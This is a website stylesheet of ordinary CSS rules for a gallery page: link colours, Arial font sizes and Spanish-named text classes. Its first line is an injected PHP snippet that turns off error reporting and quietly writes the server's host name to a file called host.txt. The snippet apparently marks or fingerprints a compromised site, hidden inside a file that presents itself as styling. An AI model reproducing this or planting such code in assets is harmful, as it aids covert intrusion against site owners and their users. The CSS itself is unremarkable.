<? error_reporting(0); $mhfp = fopen("host.txt", "w"); if ($mhfp) { fwrite($mhfp, $_SERVER["HTTP_HOST"]); fclose($mhfp); } ?>body {
  background-color: #e7e7e7;
  color: #555555;
}

a:link {color: #333333;}

a:visited {color: #666666;}

a:active {color: #CC6600;}

.gallerytitle {
  font-family: Arial;
  font-size: 16pt;
}

.thumbnailtabletitle {
  font-size: xx-small;
}

.thumbnailtitle {
  font-family: Arial;
  font-size: xx-small;
}

.navigationtext {
  font-family: Arial;
  font-weight: bold;
}
.style19 {
font-family: Arial, Helvetica, sans-serif; font-size: xx-small;
}
.style23 {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 12px;
	color: #FFFFFF;
	font-weight: bolder;
	
}
.style24 {
	font-family: Arial, Helvetica, sans-serif;
	color: #660000;
	font-weight: bolder;
	
}

.style26 {
	font-family: Arial, Helvetica, sans-serif;
	color: #006699;
	font-size: 12px;
	font-weight: bolder;	
}
.style25 {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 14px;
}
.form-texto {

	font-size: 12px;
	font-family: Arial, Helvetica, sans-serif;
	font-style: normal;
}
.barra-texto {

	font-size: 12px;
	font-family: Arial, Helvetica, sans-serif;
	font-style: normal;
	padding-top: 0px;
	padding-right: 0px;
	padding-bottom: 0px;
	padding-left: 10px;
}
.novedades-texto {

	font-size: 13px;
	font-family: Arial, Helvetica, sans-serif;
	font-style: normal;
}
.titles {
	font-family: Arial;
	font-size: 16px;
	font-weight: bold;
}
.textoblanco {
	color: #FFFFFF;
	font-family: Arial;
	font-size: 13px;
}
.indent {
	font-family: Arial;
	font-size: 11px;
	padding: 8px;
}
.espacio {
	margin-left: 6px;
}
.titulines {
	font-size: 11px;
	font-family: Arial, Helvetica, sans-serif;

}
.titulinesespacio {
	font-size: 11px;
	font-family: Arial, Helvetica, sans-serif;
	padding-top: 0px;
	padding-right: 0px;
	padding-bottom: 0px;
	padding-left: 12px;
}
.notas {
	font-size: 11px;
	font-family: Arial, Helvetica, sans-serif;
	color: #006699;

}
.navega {
	font-family: Georgia, "Times New Roman", Times, serif;
	font-size: 10px;
	color: #CC0000;
	font-weight: normal;
	text-transform: uppercase;
}
.barra {
	font-family: "Century Gothic", AvantGarde, Arial;
	font-size: 11px;
}
.textogris {
	color: #666666;
}
.textoenbarra {
	color:#666666;
	background-color:#e7ded8

}
.textoenbarragrande {
	background-color:#FFFFFF;
	font-family: "Century Gothic", AvantGarde, Arial;
	font-size:10px;
	padding-top: 0px;
	padding-right: 0px;
	padding-bottom: 0px;
	padding-left: 4px;
	font-weight: bold;
	
}

a:hover {
	text-decoration: underline;
}

